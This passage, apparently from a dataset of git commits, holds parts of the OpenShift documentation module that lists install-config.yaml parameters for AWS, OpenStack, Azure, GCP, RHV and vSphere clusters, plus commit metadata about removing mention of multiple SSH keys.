This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`controlPlane.platform.aws.type`\n|The EC2 instance type for the control plane machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`controlPlane.platform.aws.zones`\n|The availability zones where the installation program creates machines for the\ncontrol plane machine pool.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a link:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`controlPlane.aws.region`\n|The AWS region that the installation program creates control plane resources in.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`platform.aws.amiID`\n|The AWS AMI used to boot all machines for the cluster. If set, the AMI must\nbelong to the same region as the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`platform.aws.serviceEndpoints.name`\n|The AWS service endpoint name. Custom endpoints are only required for cases\nwhere alternative AWS endpoints, like FIPS, must be used. Custom API endpoints\ncan be specified for EC2, S3, IAM, Elastic Load Balancing, Tagging, Route 53,\nand STS AWS services.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] name.\n\n|`platform.aws.serviceEndpoints.url`\n|The AWS service endpoint URL. The URL must use the `https` protocol and the\nhost must trust the certificate.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] URL.\n\n|`platform.aws.userTags`\n|A map of keys and values that the installation program adds as tags to all resources that it creates.\n|Any valid YAML map, such as key value pairs in the `<key>: <value>` format. For more information about AWS tags, see link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/Using_Tags.html[Tagging Your Amazon EC2 Resources] in the AWS documentation.\n\n|`platform.aws.subnets`\n|If you provide the VPC instead of allowing the installation program to create the VPC for you, specify the subnet for the cluster to use. The subnet must be part of the same `machineNetwork[].cidr` ranges that you specify. For a standard cluster, specify a public and a private subnet for each availability zone. For a private cluster, specify a private subnet for each availability zone.\n|Valid subnet IDs.\n\n|====\nendif::aws[]\n\nifdef::osp[]\n.Additional {rh-openstack-first} parameters\n[cols=\".^2m,.^3a,^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.rootVolume.size`\n|For compute machines, the size in gigabytes of the root volume. If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`compute.platform.openstack.rootVolume.type`\n|For compute machines, the root volume's type.\n|String, for example `performance`.\n\n|`controlPlane.platform.openstack.rootVolume.size`\n|For control plane machines, the size in gigabytes of the root volume. 
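For example, a minimal sketch of this setting in the `install-config.yaml` file, with values assumed for illustration:\n\n[source,yaml]\n----\ncontrolPlane:\n platform:\n  openstack:\n   rootVolume:\n    size: 30 # gigabytes; value assumed for illustration\n    type: performance\n----\n\n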
If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`controlPlane.platform.openstack.rootVolume.type`\n|For control plane machines, the root volume's type.\n|String, for example `performance`.\n\n|`platform.openstack.cloud`\n|The name of the {rh-openstack} cloud to use from the list of clouds in the\n`clouds.yaml` file.\n|String, for example `MyCloud`.\n\n|`platform.openstack.externalNetwork`\n|The {rh-openstack} external network name to be used for installation.\n|String, for example `external`.\n\n|`platform.openstack.computeFlavor`\n|The {rh-openstack} flavor to use for control plane and compute machines.\n|String, for example `m1.xlarge`.\n|====\n\n.Optional {rh-openstack} parameters\n[%header, cols=\".^2,.^3,.^5a\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with compute machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`compute.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with compute machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`compute.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`controlPlane.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with control plane machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`controlPlane.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with control plane machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`controlPlane.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. 
For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`platform.openstack.clusterOSImage`\n|The location from which the installer downloads the {op-system} image.\n\nYou must set this parameter to perform an installation in a restricted network.\n|An HTTP or HTTPS URL, optionally with an SHA-256 checksum.\n\nFor example, `\\http:\/\/mirror.example.com\/images\/rhcos-43.81.201912131630.0-openstack.x86_64.qcow2.gz?sha256=ffebbd68e8a1f2a245ca19522c16c86f67f9ac8e4e0c1f0a812b068b16f7265d`.\nThe value can also be the name of an existing Glance image, for example `my-rhcos`.\n\n|`platform.openstack.defaultMachinePlatform`\n|The default machine pool platform configuration.\n|\n[source,json]\n----\n{\n \"type\": \"ml.large\",\n \"rootVolume\": {\n \"size\": 30,\n \"type\": \"performance\"\n }\n}\n----\n|`platform.openstack.ingressFloatingIP`\n|An existing floating IP address to associate with the Ingress port. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.lbFloatingIP`\n|An existing floating IP address to associate with the API load balancer. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.externalDNS`\n|IP addresses for external DNS servers that cluster instances use for DNS resolution.\n|A list of IP addresses as strings. For example, `[\"8.8.8.8\", \"192.168.1.12\"]`.\n\n|`platform.openstack.machinesSubnet`\n|The UUID of a {rh-openstack} subnet that the cluster's nodes use. Nodes and virtual IP (VIP) ports are created on this subnet.\n\nThe first item in `networking.machineNetwork` must match the value of `machinesSubnet`.\n\nIf you deploy to a custom subnet, you cannot specify an external DNS server to the {product-title} installer. Instead, link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_openstack_platform\/16.0\/html\/command_line_interface_reference\/subnet[add DNS to the subnet in {rh-openstack}].\n\n|A UUID as a string. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n|====\nendif::osp[]\n\nifdef::azure[]\n.Additional Azure parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`machines.platform.azure.type`\n|The Azure VM instance type.\n|VMs that use Windows or Linux as the operating system. See the\nlink:https:\/\/docs.microsoft.com\/en-us\/azure-stack\/operator\/azure-stack-supported-os?view=azs-1908[Guest operating systems supported on Azure Stack]\nin the Azure documentation.\n\n|`machines.platform.azure.osDisk.diskSizeGB`\n|The Azure disk size for the VM.\n|Integer that represents the size of the disk in GB, for example `512`. The\nminimum supported disk size is `120`.\n\n|`platform.azure.baseDomainResourceGroupName`\n|The name of the resource group that contains the DNS zone for your base domain.\n|String, for example `production_cluster`.\n\n|`platform.azure.outboundType`\n|The outbound routing strategy used to connect your cluster to the internet. If\nyou are using user-defined routing, you must have pre-existing networking\navailable where the outbound routing has already been configured prior to\ninstalling a cluster. The installation program is not responsible for\nconfiguring user-defined routing.\n|`LoadBalancer` or `UserDefinedRouting`. 
The default is `LoadBalancer`.\n\n|`platform.azure.region`\n|The name of the Azure region that hosts your cluster.\n|Any valid region name, such as `centralus`.\n\n|`platform.azure.zone`\n|List of availability zones to place machines in. For high availability, specify\nat least two zones.\n|List of zones, for example `[\"1\", \"2\", \"3\"]`.\n\n|`platform.azure.networkResourceGroupName`\n|The name of the resource group that contains the existing VNet that you want to deploy your cluster to. This name cannot be the same as the `platform.azure.baseDomainResourceGroupName`.\n|String.\n\n|`platform.azure.virtualNetwork`\n|The name of the existing VNet that you want to deploy your cluster to.\n|String.\n\n|`platform.azure.controlPlaneSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your control plane machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.computeSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your compute machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.cloudName`\n|The name of the Azure cloud environment that is used to configure the Azure SDK with the appropriate Azure API endpoints. If empty, the default value `AzurePublicCloud` is used.\n|Any valid cloud environment, such as `AzurePublicCloud` or `AzureUSGovernmentCloud`.\n\n|====\n\n[NOTE]\n====\nYou cannot customize\nlink:https:\/\/azure.microsoft.com\/en-us\/global-infrastructure\/availability-zones\/[Azure Availability Zones]\nor\nlink:https:\/\/docs.microsoft.com\/en-us\/azure\/azure-resource-manager\/resource-group-using-tags[Use tags to organize your Azure resources]\nwith an Azure cluster.\n====\nendif::azure[]\n\n\nifdef::gcp[]\n.Additional Google Cloud Platform (GCP) parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.gcp.network`\n|The name of the existing VPC that you want to deploy your cluster to.\n|String.\n\n|`platform.gcp.type`\n|The link:https:\/\/cloud.google.com\/compute\/docs\/machine-types[GCP machine type].\n|The GCP machine type.\n\n|`platform.gcp.zones`\n|The availability zones where the installation program creates machines for the specified MachinePool.\n|A list of valid link:https:\/\/cloud.google.com\/compute\/docs\/regions-zones#available[GCP availability zones], such as `us-central1-a`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`platform.gcp.controlPlaneSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your control plane machines to.\n|The subnet name.\n\n|`platform.gcp.computeSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your compute machines to.\n|The subnet name.\n|====\n\nendif::gcp[]\n\nifdef::rhv[]\n\n.Additional {rh-virtualization-first} parameters for clusters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.ovirt.ovirt_cluster_id`\n|Required. The Cluster where the VMs will be created.\n|String. For example: `68833f9f-e89c-4891-b768-e2ba0815b76b`\n\n|`platform.ovirt.ovirt_storage_domain_id`\n|Required. The Storage Domain ID where the VM disks will be created.\n|String. For example: `ed7b0f4e-0e96-492a-8fff-279213ee1468`\n\n|`platform.ovirt.ovirt_network_name`\n|Required. The network name where the VM nics will be created.\n|String. For example: `ocpcluster`\n\n|`platform.ovirt.vnicProfileID`\n|Required. The vNIC profile ID of the VM network interfaces. 
This can be inferred if the cluster network has a single profile.\n|String. For example: `3fa86930-0be5-4052-b667-b79f0a729692`\n\n|`platform.ovirt.api_vip`\n|Required. An IP address on the machine network that will be assigned to the API virtual IP (VIP). You can access the OpenShift API at this endpoint.\n|String. Example: `10.46.8.230`\n\n|`platform.ovirt.ingress_vip`\n|Required. An IP address on the machine network that will be assigned to the Ingress virtual IP (VIP).\n|String. Example: `10.46.8.232`\n|====\n\n\n.Additional {rh-virtualization} parameters for machine pools\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`<machine-pool>.platform.ovirt.cpu`\n|Optional. Defines the CPU of the VM.\n|Object\n\n|`<machine-pool>.platform.ovirt.cpu.cores`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of cores. Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.cpu.sockets`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of sockets per core. Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.memoryMB`\n|Optional. Memory of the VM in MiB.\n|Integer\n\n|`<machine-pool>.platform.ovirt.instanceTypeID`\n|Optional. An instance type UUID, such as `00000009-0009-0009-0009-0000000000f1`, which you can get from the `https:\/\/<engine-fqdn>\/ovirt-engine\/api\/instancetypes` endpoint.\n|String of UUID\n\n|`<machine-pool>.platform.ovirt.osDisk`\n|Optional. Defines the first and bootable disk of the VM.\n|String\n\n|`<machine-pool>.platform.ovirt.osDisk.sizeGB`\n|Required if you use `<machine-pool>.platform.ovirt.osDisk`. Size of the disk in GiB.\n|Number\n\n|`<machine-pool>.platform.ovirt.vmType`\n|Optional. The VM workload type, such as `high-performance`, `server`, or `desktop`.\n|String\n|====\n\n[NOTE]\n====\nYou can replace `<machine-pool>` with `controlPlane` or `compute`.\n====\n\nendif::rhv[]\n\nifdef::vsphere[]\n.Additional VMware vSphere cluster parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.vCenter`\n|The fully-qualified host name or IP address of the vCenter server.\n|String\n\n|`platform.vsphere.username`\n|The user name to use to connect to the vCenter instance with. This user must have at least\nthe roles and privileges that are required for\nlink:https:\/\/vmware.github.io\/vsphere-storage-for-kubernetes\/documentation\/vcp-roles.html[static or dynamic persistent volume provisioning]\nin vSphere.\n|String.\n\n|`platform.vsphere.password`\n|The password for the vCenter user name.\n|String.\n\n|`platform.vsphere.datacenter`\n|The name of the datacenter to use in the vCenter instance.\n|String.\n\n|`platform.vsphere.defaultDatastore`\n|The name of the default datastore to use for provisioning volumes.\n|String.\n\n|`platform.vsphere.folder`\n|_Optional_. The absolute path of an existing folder where the installation program creates the virtual machines. 
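A hypothetical example, assuming a datacenter named `dc1` and a folder named `ocp-cluster`:\n\n[source,yaml]\n----\nplatform:\n vsphere:\n  folder: \/dc1\/vm\/ocp-cluster # hypothetical datacenter and folder names\n----\n\n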
If you do not provide this value, the installation program creates a folder that is named with the infrastructure ID in the datacenter virtual machine folder.\n|String, for example, `\/<datacenter_name>\/vm\/<folder_name>\/<subfolder_name>`.\n\n|`platform.vsphere.network`\n|The network in the vCenter instance that contains the virtual IP addresses and DNS records that you configured.\n|String.\n\n|`platform.vsphere.cluster`\n|The vCenter cluster to install the {product-title} cluster in.\n|String.\n\n|`platform.vsphere.apiVIP`\n|The virtual IP (VIP) address that you configured for control plane API access.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.vsphere.ingressVIP`\n|The virtual IP (VIP) address that you configured for cluster ingress.\n|An IP address, for example `128.0.0.1`.\n|====\n\n.Optional VMware vSphere machine pool parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.osDisk.diskSizeGB`\n|The size of the disk in gigabytes.\n|Integer.\n\n|`platform.vsphere.cpus`\n|The total number of virtual processor cores to assign a virtual machine.\n|Integer.\n\n|`platform.vsphere.coresPerSocket`\n|The number of cores per socket in a virtual machine. The number of virtual sockets on the virtual machine is `platform.vsphere.cpus`\/`platform.vsphere.coresPerSocket`. The default value is `1`.\n|Integer.\n\n|`platform.vsphere.memoryMB`\n|The size of a virtual machine's memory in megabytes.\n|Integer.\n|====\n\nendif::vsphere[]\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:!rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:!vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:!osp:\n:!osp-custom:\nendif::[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"d69d03b976530fde291e2d9703d03a6d7f24edf3","subject":"RHDEVDOCS-2966 tracker for Bug 1956414 - [DOC] Remove mention of multiple ssh-keys from user doc as it is currently not officially supported","message":"RHDEVDOCS-2966 tracker for Bug 1956414 - [DOC] Remove mention of multiple ssh-keys from user doc as it is currently not officially supported\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/installation-configuration-parameters.adoc","new_file":"modules\/installation-configuration-parameters.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * installing\/installing_aws\/installing-aws-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-government-region.adoc\n\/\/ * installing\/installing_aws\/installing-aws-network-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-private.adoc\n\/\/ * installing\/installing_aws\/installing-aws-vpc.adoc\n\/\/ * installing\/installing_azure\/installing-azure-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-government-region.adoc\n\/\/ * installing\/installing_azure\/installing-azure-network-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-private.adoc\n\/\/ * installing\/installing_azure\/installing-azure-vnet.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-private.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-network-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-vpc.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-custom.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-kuryr.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user-kuryr.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-custom.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-network-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-restricted-networks-vmc.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-network-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-restricted-networks-installer-provisioned-vsphere.adoc\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" 
== \"installing-gcp-private\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-network-customizations\"]\n:vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-customizations\"]\n:vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-network-customizations\"]\n:vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-vmc\"]\n:vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-installer-provisioned-vsphere\"]\n:vsphere:\nendif::[]\n\n[id=\"installation-configuration-parameters_{context}\"]\n= Installation configuration parameters\n\nBefore you deploy an {product-title} cluster, you provide parameter values to describe your account on the cloud platform that hosts your cluster and optionally customize your cluster's platform. When you create the `install-config.yaml` installation configuration file, you provide values for the required parameters through the command line. If you customize your cluster, you can modify the `install-config.yaml` file to provide more details about the platform.\n\n[NOTE]\n====\nAfter installation, you cannot modify these parameters in the `install-config.yaml` file.\n====\n\n[IMPORTANT]\n====\nThe `openshift-install` command does not validate field names for parameters. If an incorrect name is specified, the related file or object is not created, and no error is reported. Ensure that the field names for any parameters that are specified are correct.\n====\n\n.Required parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`apiVersion`\n|The API version for the `install-config.yaml` content. The current version is `v1`. The installer may also support older API versions.\n|String\n\n|`baseDomain`\n|The base domain of your cloud provider. The base domain is used to create routes to your {product-title} cluster components. The full DNS name for your cluster is a combination of the `baseDomain` and `metadata.name` parameter values that uses the `<metadata.name>.<baseDomain>` format.\n|A fully-qualified domain or subdomain name, such as `example.com`.\n\n|`metadata`\n|Kubernetes resource `ObjectMeta`, from which only the `name` parameter is consumed.\n|Object\n\n|`metadata.name`\n|The name of the cluster. 
DNS records for the cluster are all subdomains of `{{.metadata.name}}.{{.baseDomain}}`.\n|String of lowercase letters, hyphens (`-`), and periods (`.`), such as `dev`.\nifdef::osp[]\nThe string must be 14 characters or fewer.\nendif::osp[]\n\n|`platform`\n|The configuration for the specific platform upon which to perform the installation: `aws`, `baremetal`, `azure`, `openstack`, `ovirt`, `vsphere`. For additional information about `platform.<platform>` parameters, consult the following table for your specific platform.\n|Object\n\nifndef::openshift-origin[]\n|`pullSecret`\n|Get this pull secret from link:https:\/\/cloud.redhat.com\/openshift\/install\/pull-secret[] to authenticate downloading container images for {product-title} components from services such as Quay.io.\n|\n[source,json]\n----\n{\n \"auths\":{\n \"cloud.openshift.com\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n },\n \"quay.io\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n }\n }\n}\n----\nendif::[]\n\n|====\n\n.Optional parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`additionalTrustBundle`\n|A PEM-encoded X.509 certificate bundle that is added to the nodes' trusted certificate store. This trust bundle may also be used when a proxy has been configured.\n|String\n\n|`compute`\n|The configuration for the machines that comprise the compute nodes.\n|Array of machine-pool objects. For details, see the following \"Machine-pool\" table.\n\n|`compute.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heterogeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`compute.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on compute machines. By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`compute.name`\n|Required if you use `compute`. The name of the machine pool.\n|`worker`\n\n|`compute.platform`\n|Required if you use `compute`. Use this parameter to specify the cloud provider to host the worker machines. This parameter value must match the `controlPlane.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`compute.replicas`\n|The number of compute machines, which are also known as worker machines, to provision.\n|A positive integer greater than or equal to `2`. The default value is `3`.\n\n|`controlPlane`\n|The configuration for the machines that comprise the control plane.\n|Array of `MachinePool` objects. For details, see the following \"Machine-pool\" table.\n\n|`controlPlane.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heterogeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`controlPlane.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on control plane machines. 
By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`controlPlane.name`\n|Required if you use `controlPlane`. The name of the machine pool.\n|`master`\n\n|`controlPlane.platform`\n|Required if you use `controlPlane`. Use this parameter to specify the cloud provider that hosts the control plane machines. This parameter value must match the `compute.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`controlPlane.replicas`\n|The number of control plane machines to provision.\n|The only supported value is `3`, which is the default value.\n\n|`credentialsMode`\n|The Cloud Credential Operator (CCO) mode. If no mode is specified, the CCO dynamically tries to determine the capabilities of the provided credentials, with a preference for mint mode on the platforms where multiple modes are supported.\n[NOTE]\n====\nNot all CCO modes are supported for all cloud providers. For more information on CCO modes, see the _Cloud Credential Operator_ entry in the _Red Hat Operators reference_ content.\n====\n|`Mint`, `Passthrough`, `Manual`, or an empty string (`\"\"`).\nifndef::openshift-origin[]\n|`fips`\n|Enable or disable FIPS mode. The default is `false` (disabled). If FIPS mode is enabled, the {op-system-first} machines that {product-title} runs on bypass the default Kubernetes cryptography suite and use the cryptography modules that are provided with {op-system} instead.\n[NOTE]\n====\nIf you are using Azure File storage, you cannot enable FIPS mode.\n====\n|`false` or `true`\nendif::openshift-origin[]\n|`imageContentSources`\n|Sources and repositories for the release-image content.\n|Array of objects. Includes a `source` and, optionally, `mirrors`, as described in the following rows of this table.\n\n|`imageContentSources.source`\n|Required if you use `imageContentSources`. Specify the repository that users refer to, for example, in image pull specifications.\n|String\n\n|`imageContentSources.mirrors`\n|Specify one or more repositories that may also contain the same images.\n|Array of strings\n\n|`networking`\n|The configuration for the network for the cluster.\n|Object\n\n[NOTE]\n====\nYou cannot modify parameters specified by the `networking` object after installation.\n====\n\n|`networking.networkType`\n|The default Container Network Interface (CNI) network provider plug-in to install.\nifdef::openshift-origin[]\nEither `OpenShiftSDN` or `OVNKubernetes`. The default value is `OVNKubernetes`.\nendif::openshift-origin[]\nifndef::openshift-origin[]\nEither `OpenShiftSDN` or `OVNKubernetes`. The default value is `OpenShiftSDN`.\nendif::openshift-origin[]\n|String\n\n|`networking.clusterNetwork`\n|The IP address blocks for pods. The default is `10.128.0.0\/14` with a host prefix of `\/23`. If you specify multiple IP address blocks, the blocks must not overlap.\n|Array of objects. For example:\n\n[source,yaml]\n----\nnetworking:\n clusterNetwork:\n - cidr: 10.128.0.0\/14\n hostPrefix: 23\n----\n\n|`networking.clusterNetwork.cidr`\n|Required if you use `networking.clusterNetwork`. An IP address block.\n|IP network in Classless Inter-Domain Routing (CIDR) notation. For example, `10.128.0.0\/14`.\n\n|`networking.clusterNetwork.hostPrefix`\n|The subnet prefix length to assign to each individual node. 
